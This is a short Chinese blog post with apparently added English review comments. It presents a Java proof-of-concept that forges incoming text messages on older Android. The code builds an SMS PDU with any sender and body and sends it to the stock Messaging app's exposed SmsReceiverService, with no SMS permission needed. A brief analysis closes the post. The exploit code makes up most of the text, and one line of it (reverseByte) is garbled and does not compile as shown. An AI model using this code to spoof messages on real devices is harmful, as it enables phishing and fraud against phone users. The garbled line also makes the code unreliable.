android无权限伪造短信
发布于:2012-11-12 13:17
0x01
这个有是大名鼎鼎的蒋教授发现的,原理简单,有点意思
0x02 代码实现
java代码
// Demo activity from the post: a button click reads a sender number and a
// message body from two text fields and hands them to createFakeSms(), which
// delivers a hand-built PDU to the stock Messaging app as if it had arrived
// from the radio.
//
// Review context: per the page's own analysis, the issue is that the
// receiving service accepts this intent from an app that holds no SMS
// permission. On the receiving side, a component that handles
// SMS_RECEIVED-style intents should not be reachable by arbitrary apps
// (not exported, or guarded by a permission third-party apps cannot hold).
// When auditing an app, an explicit intent aimed at another package's
// internal service together with a locally assembled "pdus" extra is the
// pattern to look for.
package com.smstrick;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Calendar;
import java.util.GregorianCalendar;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.PhoneNumberUtils;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.EditText;

public class SMSTrickActivity extends Activity implements OnClickListener{
    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        // Register this activity as the click handler for button1.
        View continue_button = this.findViewById(R.id.button1);
        continue_button.setOnClickListener((OnClickListener) this);
    }

    /**
     * Click handler: reads editText1 as the sender number and editText2 as
     * the message body, then passes both to createFakeSms().
     */
    public void onClick(View v) {
        EditText eNum;
        EditText eMsg;
        String sNum;
        String sMsg;
        eNum = (EditText)findViewById(R.id.editText1);
        eMsg = (EditText)findViewById(R.id.editText2);
        sNum = eNum.getText().toString();
        sMsg = eMsg.getText().toString();
        //sNum cannot be blank
        if(sNum.equals(""))
            sNum = "123456";
        createFakeSms(this.getApplicationContext(),sNum,sMsg);
    }

    /**
     * Assembles a byte array in {@code pdu} (service-centre address, sender
     * address, seven timestamp bytes, packed body) and sends it in an
     * explicit intent to com.android.mms's SmsReceiverService with the
     * SMS_RECEIVED action.
     *
     * Both the sender and the body are caller-chosen; nothing in this method
     * ties them to a real message, which is why the receiving side cannot
     * trust such an intent unless it restricts who may send it.
     */
    private static void createFakeSms(Context context, String sender, String body) {
        //Source: http://stackoverflow.com/a/12338541
        //Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
        // pdu stays null unless the outer try below completes.
        byte[] pdu = null;
        // Fixed all-zero service-centre number and the caller-supplied sender,
        // both converted by PhoneNumberUtils.networkPortionToCalledPartyBCD.
        byte[] scBytes = PhoneNumberUtils
                .networkPortionToCalledPartyBCD("0000000000");
        byte[] senderBytes = PhoneNumberUtils
                .networkPortionToCalledPartyBCD(sender);
        int lsmcs = scBytes.length;
        // Seven timestamp bytes taken from the device's current calendar; each
        // field is cast to a byte and passed through reverseByte().
        byte[] dateBytes = new byte[7];
        Calendar calendar = new GregorianCalendar();
        dateBytes[0] = reverseByte((byte) (calendar.get(Calendar.YEAR)));
        dateBytes[1] = reverseByte((byte) (calendar.get(Calendar.MONTH) + 1));
        dateBytes[2] = reverseByte((byte) (calendar.get(Calendar.DAY_OF_MONTH)));
        dateBytes[3] = reverseByte((byte) (calendar.get(Calendar.HOUR_OF_DAY)));
        dateBytes[4] = reverseByte((byte) (calendar.get(Calendar.MINUTE)));
        dateBytes[5] = reverseByte((byte) (calendar.get(Calendar.SECOND)));
        // Zone plus DST offset in milliseconds, divided into 15-minute units.
        dateBytes[6] = reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar
                .get(Calendar.DST_OFFSET)) / (60 * 1000 * 15)));
        try {
            Log.d("ice", "test one");
            ByteArrayOutputStream bo = new ByteArrayOutputStream();
            bo.write(lsmcs);
            bo.write(scBytes);
            bo.write(0x04);
            // Length field is the character count of the sender string.
            bo.write((byte) sender.length());
            bo.write(senderBytes);
            bo.write(0x00);
            bo.write(0x00); // encoding: 0 for default 7bit
            bo.write(dateBytes);
            try {
                // Reflection into a non-public framework class to pack the body.
                // Any failure here is only printed, so the PDU is then built
                // without a body and still sent below.
                String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet";
                Class cReflectedNFCExtras = Class.forName(sReflectedClassName);
                Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod(
                        "stringToGsm7BitPacked", new Class[] { String.class });
                stringToGsm7BitPacked.setAccessible(true);
                byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null,
                        body);
                bo.write(bodybytes);
            } catch (Exception e) {
                e.printStackTrace();
            }
            pdu = bo.toByteArray();
        } catch (IOException e) {
            // Only printed; execution continues with pdu == null.
            e.printStackTrace();
        }
        // Explicit intent naming a service inside the stock Messaging package.
        // The sending app declares no SMS permission; the page's point is that
        // the receiver processes the intent anyway.
        // NOTE(review): presumably the target service is exported without a
        // permission check on the affected builds — confirm against the
        // platform version under test.
        Intent intent = new Intent();
        intent.setClassName("com.android.mms",
                "com.android.mms.transaction.SmsReceiverService");
        intent.setAction("android.provider.Telephony.SMS_RECEIVED");
        intent.putExtra("pdus", new Object[] { pdu });
        //intent.putExtra("format", "3gpp");
        context.startService(intent);
    }

    /**
     * Intended to swap the high and low nibbles of {@code b}.
     */
    private static byte reverseByte(byte b) {
        // NOTE(review): the ';' inside the parentheses looks like an
        // extraction artifact of the page (the expression does not compile as
        // shown); presumably a bitwise AND mask was intended — confirm against
        // the linked sources.
        return (byte) ((b ; 0xF0) >> 4 | (b ; 0x0F) << 4);
    }
}
0x03 实质分析
核心在于自定义了系统的
Intent intent = new Intent();
intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiverService");
intent.setAction("android.provider.Telephony.SMS_RECEIVED");
intent.putExtra("pdus", new Object[] { pdu });
//intent.putExtra("format", "3gpp");
context.startService(intent);
收到短信的intent,从而伪造了短信,而且不需要任何的权限。